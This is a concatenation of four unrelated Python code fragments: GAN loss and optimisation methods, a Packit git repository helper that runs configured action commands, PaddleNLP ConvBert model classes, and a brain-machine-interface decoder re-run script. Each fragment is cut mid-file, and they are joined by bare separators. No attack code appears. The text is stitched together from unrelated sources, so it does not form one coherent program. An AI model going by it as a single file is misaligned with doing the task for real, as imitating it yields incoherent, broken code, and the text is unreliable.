prior_loss_D_A = self.get_prior(self.netD_A.parameters(), self.opt.batchSize)
# total loss
loss_D_A = (loss_D_real + loss_D_fake) * 0.5 + (loss_D_real + loss_D_cycle_fake) * 0.5 * self.opt.gamma + prior_loss_D_A
loss_D_A.backward()
self.loss_D_A = loss_D_A.data[0]
def backward_D_B(self):
fake_A = Variable(self.fake_A).type(self.Tensor)
rec_A = Variable(self.rec_A).type(self.Tensor)
# how well it classifiers fake images
pred_fake = self.netD_B(fake_A.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
pred_cycle_fake = self.netD_B(rec_A.detach())
loss_D_cycle_fake = self.criterionGAN(pred_cycle_fake, False)
# how well it classifiers real images
pred_real = self.netD_B(self.real_A)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_x
# prior loss
prior_loss_D_B = self.get_prior(self.netD_B.parameters(), self.opt.batchSize)
# total loss
loss_D_B = (loss_D_real + loss_D_fake) * 0.5 + (loss_D_real + loss_D_cycle_fake) * 0.5 * self.opt.gamma + prior_loss_D_B
loss_D_B.backward()
self.loss_D_B = loss_D_B.data[0]
def backward_G_pair(self):
# GAN loss D_A(G_A(A)) and L1 loss
fake_B = []
loss_G_A_L1 = 0
for real_A in self.real_A_zy:
_fake = self.netG_A(real_A)
loss_G_A_L1 += self.criterionL1(_fake, self.real_B) * self.opt.lambda_A
fake_B.append(_fake)
fake_B = torch.cat(fake_B)
pred_fake = self.netD_A(fake_B)
loss_G_A = self.criterionGAN(pred_fake, True)
# GAN loss D_B(G_B(B))
fake_A = []
loss_G_B_L1 = 0
for real_B in self.real_B_zx:
_fake = self.netG_B(real_B)
loss_G_B_L1 += self.criterionL1(_fake, self.real_A) * self.opt.lambda_B
fake_A.append(_fake)
fake_A = torch.cat(fake_A)
pred_fake = self.netD_B(fake_A)
loss_G_B = self.criterionGAN(pred_fake, True)
# prior loss
prior_loss_G_A = self.get_prior(self.netG_A.parameters(), self.opt.batchSize)
prior_loss_G_B = self.get_prior(self.netG_B.parameters(), self.opt.batchSize)
# total loss
loss_G = loss_G_A + loss_G_B + (prior_loss_G_A + prior_loss_G_B) + (loss_G_A_L1 + loss_G_B_L1)
loss_G.backward()
self.fake_B = fake_B.data
self.fake_A = fake_A.data
def backward_D_A_pair(self):
fake_B = Variable(self.fake_B).type(self.Tensor)
# how well it classifiers fake images
pred_fake = self.netD_A(fake_B.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# how well it classifiers real images
pred_real = self.netD_A(self.real_B)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_y
# prior loss
prior_loss_D_A = self.get_prior(self.netD_A.parameters(), self.opt.batchSize)
# total loss
loss_D_A = (loss_D_real + loss_D_fake) * 0.5 + prior_loss_D_A
loss_D_A.backward()
def backward_D_B_pair(self):
fake_A = Variable(self.fake_A).type(self.Tensor)
# how well it classifiers fake images
pred_fake = self.netD_B(fake_A.detach())
loss_D_fake = self.criterionGAN(pred_fake, False)
# how well it classifiers real images
pred_real = self.netD_B(self.real_A)
loss_D_real = self.criterionGAN(pred_real, True) * self.opt.mc_x
# prior loss
prior_loss_D_B = self.get_prior(self.netD_B.parameters(), self.opt.batchSize)
# total loss
loss_D_B = (loss_D_real + loss_D_fake) * 0.5 + prior_loss_D_B
loss_D_B.backward()
def optimize(self, pair=False):
# forward
self.forward()
# G_A and G_B
# E_A and E_B
self.optimizer_G.zero_grad()
if pair == True:
self.backward_G_pair()
else:
self.backward_G()
self.optimizer_G.step()
# D_A
self.optimizer_D_A.zero_grad()
if pair == True:
self.backward_D_A_pair()
else:
self.backward_D_A()
self.optimizer_D_A.step()
# D_B
self.optimizer_D_B.zero_grad()
if pair == True:
self.backward_D_B_pair()
else:
self.backward_D_B()
self.optimizer_D_B.step()
def get_current_loss(self):
loss = OrderedDict([
('D_A', self.loss_D_A),
('D_B', self.loss_D_B),
('G_A', self.loss_G_A),
('G_B', self.loss_G_B)
])
if self.opt.gamma == 0:
loss['cyc_A'] = self.loss_cycle_A
loss['cyc_B'] = self.loss_cycle_B
elif self.opt.gamma > 0:
loss['cyc_G_A'] = self.loss_cycle_A
loss['cyc_G_B'] = self.loss_cycle_B
return loss
def get_stye_loss(self):
loss = OrderedDict([
('L1_A', self.loss_G_A_L1),
('L1_B', self.loss_G_B_L1)
])
return loss
def get_current_visuals(self):
real_A = util.tensor2im(self.input_A)
fake_B = util.tensor2im(self.fake_B)
rec_A = util.tensor2im(self.rec_A)
real_B = util.tensor2im(self.input_B)
fake_A = util.tensor2im(self.fake_A)
rec_B = util.tensor2im(self.rec_B)
visuals = OrderedDict([
('real_A', real_A),
('fake_B', fake_B),
('rec_A', rec_A),
('real_B', real_B),
| |
# MIT License
#
# Copyright (c) 2018-2019 Red Hat, Inc.
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import shlex
from logging import getLogger
from pathlib import Path
from typing import Optional, Callable, List, Tuple, Iterable, Dict
import git
from git import PushInfo
from packit.actions import ActionName
from packit.command_handler import RUN_COMMAND_HANDLER_MAPPING, CommandHandler
from packit.config import Config, RunCommandType
from packit.config.common_package_config import CommonPackageConfig
from packit.exceptions import PackitException
from packit.local_project import LocalProject
from packit.security import CommitVerifier
from packit.specfile import Specfile
from packit.utils import cwd
logger = getLogger(__name__)
class PackitRepositoryBase:
# mypy complains when this is a property
local_project: LocalProject
def __init__(self, config: Config, package_config: CommonPackageConfig) -> None:
"""
:param config: global configuration
:param package_config: configuration of the upstream project
"""
self.config = config
self.package_config = package_config
self._specfile_path: Optional[Path] = None
self._specfile: Optional[Specfile] = None
self.allowed_gpg_keys: Optional[List[str]] = None
self._handler_kls = None
self._command_handler: Optional[CommandHandler] = None
@property
def handler_kls(self):
if self._handler_kls is None:
logger.debug(f"Command handler: {self.config.command_handler}")
self._handler_kls = RUN_COMMAND_HANDLER_MAPPING[self.config.command_handler]
return self._handler_kls
@property
def command_handler(self) -> CommandHandler:
if self._command_handler is None:
self._command_handler = self.handler_kls(
local_project=self.local_project, config=self.config
)
return self._command_handler
def running_in_service(self) -> bool:
""" are we running in packit service? """
return self.command_handler.name == RunCommandType.sandcastle
@property
def absolute_specfile_dir(self) -> Path:
""" get dir where the spec file is"""
return Path(self.absolute_specfile_path).parent
@property
def absolute_specfile_path(self) -> Path:
if not self._specfile_path:
self._specfile_path = Path(self.local_project.working_dir).joinpath(
self.package_config.specfile_path
)
if not self._specfile_path.exists():
raise FileNotFoundError(f"Specfile {self._specfile_path} not found.")
return self._specfile_path
@property
def specfile(self) -> Specfile:
if self._specfile is None:
self._specfile = Specfile(
self.absolute_specfile_path, self.absolute_specfile_dir
)
return self._specfile
def create_branch(
self, branch_name: str, base: str = "HEAD", setup_tracking: bool = False
) -> git.Head:
"""
Create a new git branch in dist-git
:param branch_name: name of the branch to check out and fetch
:param base: we base our new branch on this one
:param setup_tracking: set up remote tracking
(exc will be raised if the branch is not in the remote)
:return the branch which was just created
"""
# it's not an error if the branch already exists
origin = self.local_project.git_repo.remote("origin")
if branch_name in self.local_project.git_repo.branches:
logger.debug(
f"It seems that branch {branch_name!r} already exists, checking it out."
)
head = self.local_project.git_repo.branches[branch_name]
else:
head = self.local_project.git_repo.create_head(branch_name, commit=base)
if setup_tracking:
if branch_name in origin.refs:
remote_ref = origin.refs[branch_name]
else:
raise PackitException(
f"Remote origin doesn't have ref {branch_name!r}."
)
# this is important to fedpkg: build can't find the tracking branch otherwise
head.set_tracking_branch(remote_ref)
return head
def checkout_branch(self, git_ref: str):
"""
Perform a `git checkout`
:param git_ref: ref to check out
"""
if git_ref in self.local_project.git_repo.heads:
head = self.local_project.git_repo.heads[git_ref]
else:
raise PackitException(f"Branch {git_ref} does not exist")
head.checkout()
def commit(self, title: str, msg: str, prefix: str = "[packit] ") -> None:
"""
Perform `git add -A` and `git commit`
"""
logger.debug("About to add all & commit.")
main_msg = f"{prefix}{title}"
# add files to index in case some are untracked
# untracked files don't make a git repo dirty, unless they are staged
self.local_project.git_repo.git.add("-A")
if not self.local_project.git_repo.is_dirty():
raise PackitException(
"No changes are present in the dist-git repo: nothing to commit."
)
self.local_project.git_repo.index.write()
commit_args = ["-s", "-m", main_msg]
if msg:
commit_args += ["-m", msg]
# TODO: attach git note to every commit created
# TODO: implement cleaning policy: once the PR is closed (merged/refused), remove the branch
# make this configurable so that people know this would happen, don't clean by default
# we should likely clean only merged PRs by default
# TODO: implement signing properly: we need to create a cert for the bot,
# distribute it to the container, prepare git config and then we can start signing
# TODO: make -s configurable
self.local_project.git_repo.git.commit(*commit_args)
def run_action(self, actions: ActionName, method: Callable = None, *args, **kwargs):
"""
Run the method in the self._with_action block.
Usage:
> self._run_action(
> action_name="sync", method=dg.sync_files, upstream_project=up.local_project
> )
> # If user provided custom command for the `sync`, it will be used.
> # Otherwise, the method `dg.sync_files` will be used
> # with parameter `upstream_project=up.local_project`
>
> self._run_action(action_name="pre-sync")
> # This will be used as an optional hook
:param actions: ActionName enum (Name of the action that can be overwritten
in the package_config.actions)
:param method: method to run if the action was not defined by user
(if not specified, the action can be used for custom hooks)
:param args: args for the method
:param kwargs: kwargs for the method
"""
if not method:
logger.debug(f"Running {actions} hook.")
if self.with_action(action=actions):
if method:
method(*args, **kwargs)
def has_action(self, action: ActionName) -> bool:
"""
Is the action defined in the config?
"""
return action in self.package_config.actions
def get_commands_for_actions(self, action: ActionName) -> List[List[str]]:
"""
Parse the following types of the structure and return list of commands in the form of list.
I)
action_name: "one cmd"
II)
action_name:
- "one cmd""
III)
action_name:
- ["one", "cmd"]
Returns [["one", "cmd"]] for all of them.
:param action: str or list[str] or list[list[str]]
:return: list[list[str]]
"""
configured_action = self.package_config.actions[action]
if isinstance(configured_action, str):
configured_action = [configured_action]
if not isinstance(configured_action, list):
raise ValueError(
f"Expecting 'str' or 'list' as a command, got '{type(configured_action)}'. "
f"The value: {configured_action}"
)
parsed_commands = []
for cmd in configured_action:
if isinstance(cmd, str):
parsed_commands.append(shlex.split(cmd))
elif isinstance(cmd, list):
parsed_commands.append(cmd)
else:
raise ValueError(
f"Expecting 'str' or 'list' as a command, got '{type(cmd)}'. "
f"The value: {cmd}"
)
return parsed_commands
def with_action(self, action: ActionName, env: Optional[Dict] = None) -> bool:
"""
If the action is defined in the self.package_config.actions,
we run it and return False (so we can skip the if block)
If the action is not defined, return True.
Usage:
> if self._with_action(action_name="patch"):
> # Run default implementation
>
> # Custom command was run if defined in the config
Context manager is currently not possible without ugly hacks:
https://stackoverflow.com/questions/12594148/skipping-execution-of-with-block
https://www.python.org/dev/peps/pep-0377/ (rejected)
:param action: ActionName enum (Name of the action that can be overwritten
in the package_config.actions)
:param env: dict with env vars to set for the command
:return: True, if the action is not overwritten, False when custom command was run
"""
logger.debug(f"Running {action}.")
if action in self.package_config.actions:
commands_to_run = self.get_commands_for_actions(action)
logger.info(f"Using user-defined script for {action}: {commands_to_run}")
for cmd in commands_to_run:
self.command_handler.run_command(command=cmd, env=env, shell=True)
return False
logger.debug(f"Running default implementation for {action}.")
return True
def get_output_from_action(
self, action: ActionName, env: Optional[Dict] = None
) -> Optional[List[str]]:
"""
Run self.actions[action] command(s) and return their outputs.
"""
if action not in self.package_config.actions:
return None
commands_to_run = self.get_commands_for_actions(action)
outputs = []
logger.info(f"Using user-defined script for {action}: {commands_to_run}")
for cmd in commands_to_run:
outputs.append(
self.command_handler.run_command(
cmd, return_output=True, env=env, shell=True
)
)
logger.debug(f"Action command output: {outputs}")
return outputs
def specfile_add_patches(self, patch_list: List[Tuple[Path, str]]) -> None:
"""
Add the given list of (patch_name, msg) to the specfile.
:param patch_list: [(patch_name, msg)]
"""
if not patch_list:
return
self.specfile.remove_applied_patches()
self.specfile.add_patches(patch_list)
self.specfile.ensure_pnum()
self.local_project.git_repo.index.write()
def get_project_url_from_distgit_spec(self) -> Optional[str]:
"""
Parse spec file and return value of URL
"""
# consider using rebase-helper for this: SpecFile.download_remote_sources
sections = self.specfile.spec_content.sections
package_section: List[str] = sections.get("%package", [])
for s in package_section:
if s.startswith("URL:"):
url = s[4:].strip()
logger.debug(f"Upstream project URL: {url}")
return url
return None
def check_last_commit(self) -> None:
if self.allowed_gpg_keys is None:
logger.debug("Allowed | |
be equal to the shape of transpose input embeddings: {}".
format(
output_embeddings.weight.shape,
input_embeddings.weight.shape,
input_embeddings.weight.t().shape, ))
if getattr(output_embeddings, "bias", None) is not None:
if output_embeddings.weight.shape[
-1] != output_embeddings.bias.shape[0]:
raise ValueError(
"the weight lase shape: {} of output_embeddings is not equal to the bias shape: {}"
"please check output_embeddings configuration".format(
output_embeddings.weight.shape[-1],
output_embeddings.bias.shape[0], ))
@register_base_model
class ConvBertModel(ConvBertPretrainedModel):
"""
The bare ConvBert Model transformer outputting raw hidden-states.
This model inherits from :class:`~paddlenlp.transformers.model_utils.PretrainedModel`.
Refer to the superclass documentation for the generic methods.
This model is also a Paddle `paddle.nn.Layer <https://www.paddlepaddle.org.cn/documentation
/docs/en/api/paddle/fluid/dygraph/layers/Layer_en.html>`__ subclass. Use it as a regular Paddle Layer
and refer to the Paddle documentation for all matter related to general usage and behavior.
Args:
vocab_size (int):
Vocabulary size of `inputs_ids` in `ConvBertModel`. Also is the vocab size of token embedding matrix.
Defines the number of different tokens that can be represented by the `inputs_ids` passed when calling `ConvBertModel`.
embedding_size (int, optional):
Dimensionality of the embedding layer. Defaults to `768`.
hidden_size (int, optional):
Dimensionality of the encoder layer and pooler layer. Defaults to `768`.
num_hidden_layers (int, optional):
Number of hidden layers in the Transformer encoder. Defaults to `12`.
num_attention_heads (int, optional):
Number of attention heads for each attention layer in the Transformer encoder.
Defaults to `12`.
intermediate_size (int, optional):
Dimensionality of the feed-forward (ff) layer in the encoder. Input tensors
to ff layers are firstly projected from `hidden_size` to `intermediate_size`,
and then projected back to `hidden_size`. Typically `intermediate_size` is larger than `hidden_size`.
Defaults to `3072`.
hidden_act (str, optional):
The non-linear activation function in the feed-forward layer.
``"gelu"``, ``"relu"`` and any other paddle supported activation functions
are supported. Defaults to `"gelu"`.
hidden_dropout_prob (float, optional):
The dropout probability for all fully connected layers in the embeddings and encoder.
Defaults to `0.1`.
attention_probs_dropout_prob (float, optional):
The dropout probability used in MultiHeadAttention in all encoder layers to drop some attention target.
Defaults to `0.1`.
max_position_embeddings (int, optional):
The maximum value of the dimensionality of position encoding, which dictates the maximum supported length of an input
sequence. Defaults to `512`.
type_vocab_size (int, optional):
The vocabulary size of `token_type_ids`.
Defaults to `2`.
initializer_range (float, optional):
The standard deviation of the normal initializer.
Defaults to 0.02.
.. note::
A normal_initializer initializes weight matrices as normal distributions.
See :meth:`ConvBertPretrainedModel.init_weights()` for how weights are initialized in `ConvBertModel`.
pad_token_id (int, optional):
The index of padding token in the token vocabulary.
Defaults to `0`.
conv_kernel_size (int, optional):
The size of the convolutional kernel.
Defaults to `9`.
head_ratio (int, optional):
Ratio gamma to reduce the number of attention heads.
Defaults to `2`.
num_groups (int, optional):
The number of groups for grouped linear layers for ConvBert model.
Defaults to `1`.
"""
def __init__(self,
vocab_size,
embedding_size=768,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
pad_token_id=0,
conv_kernel_size=9,
head_ratio=2,
num_groups=1):
super(ConvBertModel, self).__init__()
self.pad_token_id = pad_token_id
self.initializer_range = initializer_range
self.embeddings = ConvBertEmbeddings(
vocab_size,
embedding_size,
hidden_dropout_prob,
max_position_embeddings,
type_vocab_size, )
if embedding_size != hidden_size:
self.embeddings_project = nn.Linear(embedding_size, hidden_size)
encoder_layer = TransformerEncoderLayerWithConv(
hidden_size,
num_attention_heads,
intermediate_size,
dropout=hidden_dropout_prob,
activation=hidden_act,
attn_dropout=attention_probs_dropout_prob,
act_dropout=0,
conv_kernel_size=conv_kernel_size,
head_ratio=head_ratio,
num_groups=num_groups, )
self.encoder = nn.TransformerEncoder(encoder_layer, num_hidden_layers)
self.init_weights()
def get_input_embeddings(self):
return self.embeddings.word_embeddings
def set_input_embeddings(self, value):
self.embeddings.word_embeddings = value
def forward(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
r'''
The ConvBertModel forward method, overrides the `__call__()` special method.
Args:
input_ids (Tensor):
Indices of input sequence tokens in the vocabulary. They are
numerical representations of tokens that build the input sequence.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
token_type_ids (Tensor, optional):
Segment token indices to indicate different portions of the inputs.
Selected in the range ``[0, type_vocab_size - 1]``.
If `type_vocab_size` is 2, which means the inputs have two portions.
Indices can either be 0 or 1:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
Defaults to `None`, which means we don't add segment embeddings.
position_ids(Tensor, optional):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
max_position_embeddings - 1]``.
Shape as `(batch_size, num_tokens)` and dtype as int64. Defaults to `None`.
attention_mask (Tensor, optional):
Mask used in multi-head attention to avoid performing attention on to some unwanted positions,
usually the paddings or the subsequent positions.
Its data type can be int, float and bool.
If its data type is int, the values should be either 0 or 1.
- **1** for tokens that **not masked**,
- **0** for tokens that **masked**.
It is a tensor with shape broadcasted to `[batch_size, num_attention_heads, sequence_length, sequence_length]`.
Defaults to `None`, which means nothing needed to be prevented attention to.
Returns:
Tensor: Returns Tensor `sequence_output`, sequence of hidden-states at the last layer of the model.
Shape as `[batch_size, sequence_length, hidden_size]` and dtype as float32.
Example:
.. code-block::
import paddle
from paddlenlp.transformers import ConvBertModel, ConvBertTokenizer
tokenizer = ConvBertTokenizer.from_pretrained('convbert-base')
model = ConvBertModel.from_pretrained('convbert-base')
inputs = tokenizer("Welcome to use PaddlePaddle and PaddleNLP!")
inputs = {k:paddle.to_tensor([v]) for (k, v) in inputs.items()}
output = model(**inputs)
'''
if attention_mask is None:
attention_mask = paddle.unsqueeze(
(input_ids == self.pad_token_id).astype(dtype_float) * -1e9,
axis=[1, 2])
else:
attention_mask = paddle.unsqueeze(
attention_mask, axis=[1, 2]).astype(dtype_float)
attention_mask = (1.0 - attention_mask) * -1e9
embedding_output = self.embeddings(
input_ids=input_ids,
position_ids=position_ids,
token_type_ids=token_type_ids, )
if hasattr(self, "embeddings_project"):
embedding_output = self.embeddings_project(embedding_output)
sequence_output = self.encoder(embedding_output, attention_mask)
return sequence_output
class ConvBertDiscriminator(ConvBertPretrainedModel):
"""
ConvBert Model with a discriminator prediction head on top.
Args:
convbert (:class:`ConvBertModel`):
An instance of ConvBertModel.
"""
def __init__(self, convbert):
super(ConvBertDiscriminator, self).__init__()
self.convbert = convbert
self.discriminator_predictions = ConvBertDiscriminatorPredictions(
self.convbert.config["hidden_size"],
self.convbert.config["hidden_act"])
self.init_weights()
def forward(self,
input_ids,
token_type_ids=None,
position_ids=None,
attention_mask=None):
r'''
The ConvBertDiscriminator forward method, overrides the `__call__()` special method.
Args:
input_ids (Tensor):
Indices of input sequence tokens in the vocabulary. They are
numerical representations of tokens that build the input sequence.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
token_type_ids (Tensor, optional):
Segment token indices to indicate different portions of the inputs.
Selected in the range ``[0, type_vocab_size - 1]``.
If `type_vocab_size` is 2, which means the inputs have two portions.
Indices can either be 0 or 1:
- 0 corresponds to a *sentence A* token,
- 1 corresponds to a *sentence B* token.
Its data type should be `int64` and it has a shape of [batch_size, sequence_length].
Defaults to `None`, which means we don't add segment embeddings.
position_ids(Tensor, optional):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
max_position_embeddings - 1]``.
Shape as `(batch_size, num_tokens)` and dtype as int64. Defaults to `None`.
attention_mask (Tensor, optional):
Mask used in multi-head attention to avoid performing attention on to some unwanted positions,
usually the paddings or the subsequent positions.
Its data type can be int, float and bool.
If its data type is int, the values should be either 0 or 1.
- **1** for tokens that **not masked**,
- **0** for tokens that **masked**.
It is a tensor with shape broadcasted to `[batch_size, num_attention_heads, sequence_length, sequence_length]`.
Defaults to `None`, which means nothing needed to be prevented attention to.
Returns:
Tensor: Returns tensor `logits`, a tensor of the discriminator prediction logits.
Shape as `[batch_size, sequence_length]` and dtype as float32.
Example:
.. code-block::
import paddle
from paddlenlp.transformers import ConvBertDiscriminatorPredictions, ConvBertTokenizer
tokenizer = ConvBertTokenizer.from_pretrained('convbert-base')
model = ConvBertDiscriminatorPredictions.from_pretrained('convbert-base')
inputs = tokenizer("Welcome to use PaddlePaddle and PaddleNLP!")
inputs = {k:paddle.to_tensor([v]) for (k, v) in inputs.items()}
logits = model(**inputs)
'''
discriminator_sequence_output = self.convbert(
input_ids, token_type_ids, position_ids, attention_mask)
logits = self.discriminator_predictions(discriminator_sequence_output)
return logits
class ConvBertGenerator(ConvBertPretrainedModel):
"""
ConvBert Model with a generator prediction head on top.
Args:
convbert (:class:`ConvBertModel`):
An instance of ConvBertModel.
"""
def __init__(self, convbert):
super(ConvBertGenerator, self).__init__()
self.convbert = convbert
self.generator_predictions = ConvBertGeneratorPredictions(
self.convbert.config["embedding_size"],
self.convbert.config["hidden_size"],
self.convbert.config["hidden_act"], )
if not self.tie_word_embeddings:
self.generator_lm_head = nn.Linear(
self.convbert.config["embedding_size"],
self.convbert.config["vocab_size"])
else:
self.generator_lm_head_bias = paddle.create_parameter(
shape=[self.convbert.config["vocab_size"]],
dtype=dtype_float,
is_bias=True, )
self.init_weights()
def get_input_embeddings(self):
return self.convbert.embeddings.word_embeddings
def forward(
self,
input_ids=None,
token_type_ids=None,
position_ids=None,
attention_mask=None, ):
r'''
The ConvBertGenerator forward method, overrides the `__call__()` special method.
| |
import numpy as np
import pickle
from riglib.filter import Filter
from riglib.bmi.goal_calculators import ZeroVelocityGoal_ismore
from scipy.signal import butter,lfilter
from ismore import ismore_bmi_lib
import tables
from ismore.invasive.make_global_armassist_hull import global_hull
# Path:
# 7742 -- constant assist (xy = 0, ang = 0.1)
class RerunDecoding(object):
def __init__(self, hdf_file, decoder_file, safety_grid_file, xy_assist,
ang_assist, attractor_speed):
hdf = tables.openFile(hdf_file)
self.plant_pos = hdf.root.task[:]['plant_pos']
self.plant_vel = hdf.root.task[:]['plant_vel']
self.target = hdf.root.task[:]['target_pos']
spike_counts = hdf.root.task[:]['spike_counts']
self.spike_counts = np.array(spike_counts, dtype=np.float64)
self.internal_state = hdf.root.task[:]['internal_decoder_state']
self.decoder_state = hdf.root.task[:]['decoder_state']
self.raw_command = hdf.root.task[:]['command_vel_raw']
self.pre_safe_command = hdf.root.task[:]['command_vel_sent_pre_safety']
self.proc_command = hdf.root.task[:]['command_vel_sent']
self.pre_drive_state = hdf.root.task[:]['pre_drive_state']
self.state_list = hdf.root.task_msgs[:]
self.dec = pickle.load(open(decoder_file))
self.drives_neurons = self.dec.drives_neurons;
self.drives_neurons_ix0 = np.nonzero(self.drives_neurons)[0][0]
self.update_bmi_ix = np.nonzero(np.diff(np.squeeze(self.internal_state[:, self.drives_neurons_ix0, 0])))[0]+1
self.xy_assist = hdf.root.task[:]['xy_assist_level']
self.ang_assist = hdf.root.task[:]['ang_assist_level']
self.hdf = hdf
self.safety_grid = pickle.load(open(safety_grid_file))
#hdf_global = tables.openFile('/Users/preeyakhanna/Dropbox/Carmena_Lab/SpainBMI/ismore_analysis/data/hud120171010_72_te7721.hdf')
#pts = hdf_global.root.task[:]['plant_pos'][:, [0, 1, 2]]
#self.safety_grid.global_hull.hull_xy._points = pts[:, [0, 1]]
#self.safety_grid.global_hull.hull3d._points = pts
#self.safety_grid.global_hull.hull_xy.simplices = self.safety_grid.global_hull.hull_xy.vertices.copy()
#self.safety_grid.global_hull.hull3d.simplices = self.safety_grid.global_hull.hull3d.vertices.copy()
fs_synch = 20
nyq = 0.5 * fs_synch
cuttoff_freq = 5 / nyq
bpf_kin_coeffs = butter(4, cuttoff_freq, btype='low')
self.accel_lim_armassist = np.inf
self.accel_lim_psi = np.inf
self.accel_lim_rehand = np.inf
self.command_lpfs = dict()
for state in ['aa_vx', 'aa_vy', 'aa_vpsi','rh_vthumb', 'rh_vindex', 'rh_vfing3', 'rh_vprono']:
self.command_lpfs[state] = Filter(bpf_kin_coeffs[0], bpf_kin_coeffs[1]) # low-pass filter to smooth out command velocities
self.target = hdf.root.task[:]['target_pos']
self.goal_calculator = ZeroVelocityGoal_ismore(ismore_bmi_lib.SSM_CLS_DICT['IsMore'],
pause_states = ['rest', 'wait', 'instruct_rest', 'instruct_trial_type'])
asst_kwargs = {
'call_rate': 20,
'xy_cutoff': 3,
'speed': 'high',
}
self.assister = ismore_bmi_lib.LFC_GO_TO_START_ASSISTER_CLS_DICT['IsMore'](**asst_kwargs)
self.assist_level = np.array([xy_assist, ang_assist])
self.rh_pfings = [[0, 'rh_pthumb'], [1, 'rh_pindex'], [2, 'rh_pfing3']]
self.spike_counts = hdf.root.task[:]['spike_counts'][:, :, 0]
self.attractor_speed = attractor_speed
def run_decoder(self):
'''
Summary: method to use the 'predict' function in the decoder object
Input param: spike_counts: unbinned spike counts in iter x units x 1
Input param: cutoff: cutoff in iterations
'''
spike_counts = self.spike_counts
T = spike_counts.shape[0]
decoded_state = []
spike_accum = np.zeros_like(spike_counts[0,:])
dec_last = np.zeros_like(self.dec.predict(spike_counts[0,:]))
self.prev_vel_bl_aa = np.zeros((3, ))*np.nan
self.prev_vel_bl_rh = np.zeros((4, ))*np.nan
tot_spike_accum = np.zeros_like(spike_counts[0,:])-1
self.dec.filt._init_state()
self.state = 'wait'
self.sent_vel = [np.zeros((7, ))]
self.raw_vel = [np.zeros((7, ))]
self.pre_safe_vel = [np.zeros((7, ))]
self.raw_pos = [np.zeros((7, ))]
for t in range(T):
spike_accum = spike_accum+spike_counts[t,:]
if t in self.state_list[:]['time']:
ix = np.nonzero(self.state_list[:]['time']==t)[0]
self.state = self.state_list[ix[-1]]['msg']
if t in self.update_bmi_ix:
# Assister
target_state = self.get_target_BMI_state(self.plant_pos[t-1, :], self.plant_vel[t-1, :], self.target[t, :])
current_state = np.hstack((self.plant_pos[t-1, :], self.plant_vel[t-1, :], [1]))
assist_kwargs = self.assister(current_state, target_state[:,0].reshape(-1,1),
self.assist_level, mode=self.state)
#
if self.dec.zscore == True:
spike_accum = (spike_accum - self.dec.mFR)/self.dec.sdFR
spike_accum[np.isnan(spike_accum)] = 0
# Call decoder
dec_new = self.dec.predict(spike_accum, **assist_kwargs)
spike_accum = np.zeros_like(spike_counts[0,:])
else:
dec_new = self.dec.get_state()
vel_bl = dec_new[7:14]
if np.any(np.isnan(vel_bl)):
vel_bl[np.isnan(vel_bl)] = 0
self.dec.filt.state.mean[7:14, 0] = np.mat(vel_bl.copy()).T
self.raw_vel.append(vel_bl.copy())
self.raw_pos.append(dec_new[:7])
v = vel_bl.copy()
vel_post_drive = self.ismore_plant_drive(v, t)
# Send imaginary velocity command
# Set decoder['q'] to plant pos:
self.dec['q'] = self.plant_pos[t]
self.sent_vel.append(vel_post_drive)
self.raw_vel = np.vstack((self.raw_vel))
self.sent_vel = np.vstack((self.sent_vel))
self.raw_pos = np.vstack((self.raw_pos))
self.pre_safe_vel = np.vstack((self.pre_safe_vel))
def ismore_plant_drive(self, vel_bl, t):
current_state = self.pre_drive_state[t, :]
### Velocity processing in plants.drive ###
vel_bl_aa = vel_bl[0:3]
vel_bl_rh = vel_bl[3:7]
### Accel Limit Velocitites ###
### Accel Limit Velocitites ###
### Accel Limit Velocitites ###
if not np.all(np.isnan(np.hstack((self.prev_vel_bl_aa, self.prev_vel_bl_rh)))):
aa_output_accel = vel_bl_aa - self.prev_vel_bl_aa
rh_output_accel = vel_bl_rh - self.prev_vel_bl_rh
### AA XY ###
for i in np.arange(2):
if aa_output_accel[i] > self.accel_lim_armassist:
vel_bl_aa[i] = self.prev_vel_bl_aa[i] + self.accel_lim_armassist
elif aa_output_accel[i] < -1*self.accel_lim_armassist:
vel_bl_aa[i] = self.prev_vel_bl_aa[i] - self.accel_lim_armassist
### AA PSI ###
if aa_output_accel[2] > self.accel_lim_psi:
vel_bl_aa[2] = self.prev_vel_bl_aa[2] + self.accel_lim_psi
elif aa_output_accel[2] < -1*self.accel_lim_psi:
vel_bl_aa[2] = self.prev_vel_bl_aa[2] - self.accel_lim_psi
### RH All ###
for i in np.arange(4):
if rh_output_accel[i] > self.accel_lim_rehand:
vel_bl_rh[i] = self.prev_vel_bl_rh[i] + self.accel_lim_rehand
elif rh_output_accel[i] < -1*self.accel_lim_rehand:
vel_bl_rh[i] = self.prev_vel_bl_rh[i] - self.accel_lim_rehand
### LPF Filter Velocities ###
### LPF Filter Velocities ###
### LPF Filter Velocities ###
